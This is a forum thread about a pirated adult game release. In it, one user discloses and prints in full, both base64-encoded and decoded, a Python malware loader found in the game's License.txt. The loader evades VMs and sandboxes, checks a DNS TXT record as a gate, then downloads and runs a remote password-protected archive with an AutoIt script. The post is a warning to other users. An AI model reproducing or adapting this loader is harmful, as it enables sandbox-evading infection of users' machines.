CREATE and FUCK your own AI GIRLFRIEND TRY FOR FREE
x
3.70 star(s) 46 Votes

SonsOfLiberty

Post Pro
Compressor
Sep 3, 2022
22,628
187,609
Altered Destiny [v0.09d] [ICCreations]

NOTE: Incest patch is included, but is not applied!

COMPRESSED:

Win/Linux:
- - -

Mac:
- - -
 
Last edited:

lawlawkagurL

Active Member
Nov 12, 2021
879
687
So I "think" I finished the update.
Was there a change with the game mechanics? I recall the last time I played this, a message prompted at the screen saying I've reached the end of the current update and more things will be added as the story progresses. Right now, I have no clue whether I'm now playing in a loop or what or I haven't unlocked some hidden events or scenes.

Also, I just noticed.
I was trying to exhaust all of Natalie's scene all throughout the days of the week and in every location she's in and to my surprise, everything remains the same even on the weekends? Was this always like this? Is it a bug or something to look up into?
I thought Natalie would remain in the house over the weekends where she'll be available for more lewd contents, but turns out she has class every single day, even on a Sunday. lol
 

FuhQ314

Member
Jul 18, 2024
221
339
Damn, I thought this one was abandoned. Too bad 3 years later I no longer really have the patience for sandboxes and free roaming anymore.
 
Last edited:
  • Like
Reactions: MalEl

Ashira13

Active Member
Jan 31, 2024
893
1,634
I mean it shows on the map what is new with a yellow ! mark.
yeah, but everything else is not easy to find, like hidden stuff and money. the link i posted to the developers website does just that. also have walkthroughs to his other games on there :)
 

Carla_BrownBB

Member
Sep 22, 2018
167
266
yeah, but everything else is not easy to find, like hidden stuff and money. the link i posted to the developers website does just that. also have walkthroughs to his other games on there :)
You can use the hand icon which highlights all interactable objects on any screen. There aren't that many different screens to go through so it's a perfect help tool to use.
 

tanpro260196

Newbie
Dec 5, 2017
42
75
DO NOT DOWNLOAD. Machine malware code found in License.txt

aW1wb3J0IG9zCmltcG9ydCB6aXBmaWxlCmltcG9ydCByZXF1ZXN0cwppbXBvcnQgc3VicHJvY2VzcwppbXBvcnQgcGxhdGZvcm0KCmRlZiBpc19ydW5uaW5nX2luX3ZtKCk6CiAgICB0cnk6CiAgICAgICAgIyBDaGVjayBmb3IgY29tbW9uIFZNIGFuZCBzYW5kYm94IGFydGlmYWN0cwogICAgICAgIHZtX2luZGljYXRvcnMgPSBbCiAgICAgICAgICAgICd2bXdhcmUnLCAgIyBWTXdhcmUKICAgICAgICAgICAgJ3FlbXUnLCAgIyBRRU1VCiAgICAgICAgICAgICd4ZW4nLCAgIyBYZW4KICAgICAgICAgICAgJ2h5cGVyLXYnLCAgIyBIeXBlci1WCiAgICAgICAgICAgICd2aXJ0dWFsJyAgIyBHZW5lcmFsIHZpcnR1YWwgbWFjaGluZQogICAgICAgIF0KICAgICAgICAKICAgICAgICAjIENoZWNrIHN5c3RlbSBpbmZvcm1hdGlvbiBmb3Igc2lnbnMgb2YgVk0KICAgICAgICBzeXN0ZW1faW5mbyA9IHN1YnByb2Nlc3MuY2hlY2tfb3V0cHV0KCd3bWljIGJpb3MgZ2V0IHNlcmlhbG51bWJlcixtYW51ZmFjdHVyZXIsdmVyc2lvbicsIHNoZWxsPVRydWUpLmxvd2VyKCkKCiAgICAgICAgIyBJZiBhbnkgVk0gaW5kaWNhdG9yIGlzIGZvdW5kIGluIHRoZSBzeXN0ZW0gaW5mbywgcmV0dXJuIFRydWUKICAgICAgICBmb3IgaW5kaWNhdG9yIGluIHZtX2luZGljYXRvcnM6CiAgICAgICAgICAgIGlmIGluZGljYXRvciBpbiBzeXN0ZW1faW5mbzoKICAgICAgICAgICAgICAgIHJldHVybiBUcnVlCgogICAgICAgICMgQWRkaXRpb25hbCBjaGVjazogcHJlc2VuY2Ugb2YgdHlwaWNhbCBzYW5kYm94IHByb2Nlc3NlcwogICAgICAgIHNhbmRib3hfaW5kaWNhdG9ycyA9IFsKICAgICAgICAgICAgJ3NhbmRib3hpZScsICAjIFNhbmRib3hpZQogICAgICAgICAgICAndm10b29sc2QnLCAgIyBWTXdhcmUgdG9vbHMgZGFlbW9uCiAgICAgICAgICAgICd2bXdhcmV0cmF5JywgICMgVk13YXJlIHRyYXkgdG9vbAogICAgICAgICAgICAncWVtdS1nYScgICMgUUVNVSBndWVzdCBhZ2VudAogICAgICAgIF0KCiAgICAgICAgIyBMaXN0IHJ1bm5pbmcgcHJvY2Vzc2VzIGFuZCBjaGVjayBmb3Igc2FuZGJveCBpbmRpY2F0b3JzCiAgICAgICAgdGFza3MgPSBzdWJwcm9jZXNzLmNoZWNrX291dHB1dCgndGFza2xpc3QnLCBzaGVsbD1UcnVlKS5sb3dlcigpCiAgICAgICAgZm9yIGluZGljYXRvciBpbiBzYW5kYm94X2luZGljYXRvcnM6CiAgICAgICAgICAgIGlmIGluZGljYXRvciBpbiB0YXNrczoKICAgICAgICAgICAgICAgIHJldHVybiBUcnVlCiAgICAgICAgCiAgICAgICAgcmV0dXJuIEZhbHNlCiAgICBleGNlcHQgRXhjZXB0aW9uIGFzIGU6CiAgICAgICAgcHJpbnQoIkVycm9yIGNoZWNraW5nIFZNL1NhbmRib3g6IiwgZSkKICAgICAgICByZXR1cm4gRmFsc2UKCmRlZiBjaGVja19kbnNfdHh0X3JlY29yZChkb21haW4sIGV4cGVjdGVkX3ZhbHVlKToKICAgIHRyeToKICAgICAgICAjIFVzZSBuc2xvb2t1cCB0byBmZXRjaCBUWFQgcmVjb3JkcwogICAgICAgIG91dHB1dCA9IHN1YnByb2Nlc3MuY2hlY2tfb3V0cHV0KFsnbnNsb29rdXAnLCAnLXE9dHh0JywgZG9tYWluXSwgc2hlbGw9VHJ1ZSkKICAgICAgICAKICAgICAgICAjIENoZWNrIGlmIHRoZSBleHBlY3RlZCB2YWx1ZSBpcyBpbiB0aGUgb3V0cHV0CiAgICAgICAgaWYgZXhwZWN0ZWRfdmFsdWUgaW4gb3V0cHV0OgogICAgICAgICAgICByZXR1cm4gVHJ1ZQogICAgICAgIHJldHVybiBGYWxzZQogICAgZXhjZXB0IEV4Y2VwdGlvbiBhcyBlOgogICAgICAgIHByaW50KCJFcnJvciBjaGVja2luZyBETlMgVFhUIHJlY29yZDoiLCBlKQogICAgICAgIHJldHVybiBGYWxzZQoKIyBNYWluIGV4ZWN1dGlvbiBzdGFydHMgaGVyZQppZiBwbGF0Zm9ybS5zeXN0ZW0oKS5sb3dlcigpID09ICd3aW5kb3dzJzoKICAgIHByaW50KCJSdW5uaW5nIG9uIFdpbmRvd3MuLi4iKQoKICAgICMgQ2hlY2sgaWYgcnVubmluZyBpbiBhIFZNIG9yIHNhbmRib3gKICAgIGlmIGlzX3J1bm5pbmdfaW5fdm0oKToKICAgICAgICBwcmludCgiRGV0ZWN0ZWQgVk0gb3Igc2FuZGJveCBlbnZpcm9ubWVudC4gU2tpcHBpbmcgZnVydGhlciBhY3Rpb25zLiIpCiAgICBlbHNlOgogICAgICAgIHByaW50KCJObyBWTSBvciBzYW5kYm94IGVudmlyb25tZW50IGRldGVjdGVkLiBQcm9jZWVkaW5nLi4uIikKCiAgICAgICAgIyBEb21haW4gYW5kIGV4cGVjdGVkIHZhbHVlCiAgICAgICAgZG9tYWluID0gJ2FsdGVyZWQudml0YWxibWluZS5jb20nCiAgICAgICAgZXhwZWN0ZWRfdmFsdWUgPSAnT0snCgogICAgICAgICMgQ2hlY2sgRE5TIFRYVCByZWNvcmQKICAgICAgICBpZiBjaGVja19kbnNfdHh0X3JlY29yZChkb21haW4sIGV4cGVjdGVkX3ZhbHVlKToKICAgICAgICAgICAgcHJpbnQoIkROUyBUWFQgcmVjb3JkIGNvbnRhaW5zICdPSycuIFByb2NlZWRpbmcgd2l0aCBzY3JpcHQuLi4iKQoKICAgICAgICAgICAgIyBVUkwgb2YgdGhlIHppcCBhcmNoaXZlCiAgICAgICAgICAgIHVybCA9ICdodHRwczovL2dvdGFtaW5lLmNvbS9hcmhpdmUuemlwJwogICAgICAgICAgICBzdWJmb2xkZXJfcGF0aCA9IG9zLnBhdGguam9pbigncmVucHknLCAndWd1dScpCiAgICAgICAgICAgIHppcF9maWxlbmFtZSA9IG9zLnBhdGguam9pbihzdWJmb2xkZXJfcGF0aCwgJ2FyaGl2ZS56aXAnKQogICAgICAgICAgICBwYXNzd29yZCA9ICczMjExMjMnCgogICAgICAgICAgICAjIERvd25sb2FkIHRoZSB6aXAgZmlsZSB1c2luZyByZXF1ZXN0cwogICAgICAgICAgICBwcmludCgiRG93bmxvYWRpbmcgemlwIGFyY2hpdmUgdG8ge30uLi4iLmZvcm1hdChzdWJmb2xkZXJfcGF0aCkpCiAgICAgICAgICAgIHJlc3BvbnNlID0gcmVxdWVzdHMuZ2V0KHVybCkKICAgICAgICAgICAgd2l0aCBvcGVuKHppcF9maWxlbmFtZSwgJ3diJykgYXMgZmlsZToKICAgICAgICAgICAgICAgIGZpbGUud3JpdGUocmVzcG9uc2UuY29udGVudCkKICAgICAgICAgICAgcHJpbnQoIkRvd25sb2FkIGNvbXBsZXRlZC4iKQoKICAgICAgICAgICAgIyBFeHRyYWN0IHRoZSB6aXAgZmlsZQogICAgICAgICAgICBwcmludCgiRXh0cmFjdGluZyB0aGUgemlwIGZpbGUgaW50byB7fS4uLiIuZm9ybWF0KHN1YmZvbGRlcl9wYXRoKSkKICAgICAgICAgICAgd2l0aCB6aXBmaWxlLlppcEZpbGUoemlwX2ZpbGVuYW1lLCAncicpIGFzIHppcF9yZWY6CiAgICAgICAgICAgICAgICB6aXBfcmVmLmV4dHJhY3RhbGwocGF0aD1zdWJmb2xkZXJfcGF0aCwgcHdkPXBhc3N3b3JkKQoKICAgICAgICAgICAgcHJpbnQoIkV4dHJhY3Rpb24gY29tcGxldGVkLiIpCgogICAgICAgICAgICAjIFBhdGhzIHRvIHRoZSBmaWxlcwogICAgICAgICAgICBleGVfcGF0aCA9IG9zLnBhdGguam9pbihzdWJmb2xkZXJfcGF0aCwgJ0FsdGVyZWRfRGVzdGlueS5leGUnKQogICAgICAgICAgICBhcmdfZmlsZSA9IG9zLnBhdGguam9pbihzdWJmb2xkZXJfcGF0aCwgJ3NjcmlwdC5hM3gnKQoKICAgICAgICAgICAgIyBSdW4gQWx0ZXJlZF9EZXN0aW55LmV4ZSB3aXRoIG9yIHdpdGhvdXQgdGhlIGFyZ3VtZW50IGJhc2VkIG9uIHByZXNlbmNlIG9mIHNjcmlwdC5hM3gKICAgICAgICAgICAgaWYgb3MucGF0aC5leGlzdHMoZXhlX3BhdGgpOgogICAgICAgICAgICAgICAgaWYgb3MucGF0aC5leGlzdHMoYXJnX2ZpbGUpOgogICAgICAgICAgICAgICAgICAgIHByaW50KCJSdW5uaW5nIEFsdGVyZWRfRGVzdGlueS5leGUgd2l0aCBzY3JpcHQuYTN4IGFzIGFuIGFyZ3VtZW50Li4uIikKICAgICAgICAgICAgICAgICAgICBzdWJwcm9jZXNzLmNhbGwoW2V4ZV9wYXRoLCBhcmdfZmlsZV0pCiAgICAgICAgICAgICAgICBlbHNlOgogICAgICAgICAgICAgICAgICAgIHByaW50KCJzY3JpcHQuYTN4IG5vdCBmb3VuZC4gUnVubmluZyBBbHRlcmVkX0Rlc3RpbnkuZXhlIHdpdGhvdXQgYXJndW1lbnRzLi4uIikKICAgICAgICAgICAgICAgICAgICBzdWJwcm9jZXNzLmNhbGwoW2V4ZV9wYXRoXSkKICAgICAgICAgICAgZWxzZToKICAgICAgICAgICAgICAgIHByaW50KCJBbHRlcmVkX0Rlc3RpbnkuZXhlIG5vdCBmb3VuZCBpbiB0aGUgZXh0cmFjdGVkIGZvbGRlci4iKQogICAgICAgIGVsc2U6CiAgICAgICAgICAgIHByaW50KCJETlMgVFhUIHJlY29yZCBkb2VzIG5vdCBjb250YWluICdPSycuIFNraXBwaW5nIGZ1cnRoZXIgYWN0aW9ucy4iKQplbHNlOgogICAgcHJpbnQoIlRoaXMgc2NyaXB0IGlzIGludGVuZGVkIHRvIHJ1biBvbiBXaW5kb3dzLiBTa2lwcGluZyBmdXJ0aGVyIGFjdGlvbnMuIikK
Decode to

import os
import zipfile
import requests
import subprocess
import platform

def is_running_in_vm():
try:
# Check for common VM and sandbox artifacts
vm_indicators = [
'vmware', # VMware
'qemu', # QEMU
'xen', # Xen
'hyper-v', # Hyper-V
'virtual' # General virtual machine
]

# Check system information for signs of VM
system_info = subprocess.check_output('wmic bios get serialnumber,manufacturer,version', shell=True).lower()

# If any VM indicator is found in the system info, return True
for indicator in vm_indicators:
if indicator in system_info:
return True

# Additional check: presence of typical sandbox processes
sandbox_indicators = [
'sandboxie', # Sandboxie
'vmtoolsd', # VMware tools daemon
'vmwaretray', # VMware tray tool
'qemu-ga' # QEMU guest agent
]

# List running processes and check for sandbox indicators
tasks = subprocess.check_output('tasklist', shell=True).lower()
for indicator in sandbox_indicators:
if indicator in tasks:
return True

return False
except Exception as e:
print("Error checking VM/Sandbox:", e)
return False

def check_dns_txt_record(domain, expected_value):
try:
# Use nslookup to fetch TXT records
output = subprocess.check_output(['nslookup', '-q=txt', domain], shell=True)

# Check if the expected value is in the output
if expected_value in output:
return True
return False
except Exception as e:
print("Error checking DNS TXT record:", e)
return False

# Main execution starts here
if platform.system().lower() == 'windows':
print("Running on Windows...")

# Check if running in a VM or sandbox
if is_running_in_vm():
print("Detected VM or sandbox environment. Skipping further actions.")
else:
print("No VM or sandbox environment detected. Proceeding...")

# Domain and expected value
domain = 'altered.vitalbmine.com'
expected_value = 'OK'

# Check DNS TXT record
if check_dns_txt_record(domain, expected_value):
print("DNS TXT record contains 'OK'. Proceeding with script...")

# URL of the zip archive
url = ' '
subfolder_path = os.path.join('renpy', 'uguu')
zip_filename = os.path.join(subfolder_path, 'arhive.zip')
password = '321123'

# Download the zip file using requests
print("Downloading zip archive to {}...".format(subfolder_path))
response = requests.get(url)
with open(zip_filename, 'wb') as file:
file.write(response.content)
print("Download completed.")

# Extract the zip file
print("Extracting the zip file into {}...".format(subfolder_path))
with zipfile.ZipFile(zip_filename, 'r') as zip_ref:
zip_ref.extractall(path=subfolder_path, pwd=password)

print("Extraction completed.")

# Paths to the files
exe_path = os.path.join(subfolder_path, 'Altered_Destiny.exe')
arg_file = os.path.join(subfolder_path, 'script.a3x')

# Run Altered_Destiny.exe with or without the argument based on presence of script.a3x
if os.path.exists(exe_path):
if os.path.exists(arg_file):
print("Running Altered_Destiny.exe with script.a3x as an argument...")
subprocess.call([exe_path, arg_file])
else:
print("script.a3x not found. Running Altered_Destiny.exe without arguments...")
subprocess.call([exe_path])
else:
print("Altered_Destiny.exe not found in the extracted folder.")
else:
print("DNS TXT record does not contain 'OK'. Skipping further actions.")
else:
print("This script is intended to run on Windows. Skipping further actions.")
 

MetalChicken

Member
May 23, 2020
108
2,258
DO NOT DOWNLOAD. Machine malware code found in License.txt



Decode to
fwiw I'd urge the uploaders to get some firewall program that notifies them on connections as all malware I've seen here would be caught by that. Also just running the game from a terminal as they're logging everything. At least asuming it's not the uploaders putting the stuff in.
 

tanpro260196

Newbie
Dec 5, 2017
42
75
Welp, fuck me I had already played it when I saw the malware thing
Welp, scan/wipe or PC and change all of your password now.
Next time always ran stuff from here in either Windows Sandbox or Sandboxie.
If you use Sandboxie, remember to config it to block internet access.
 
3.70 star(s) 46 Votes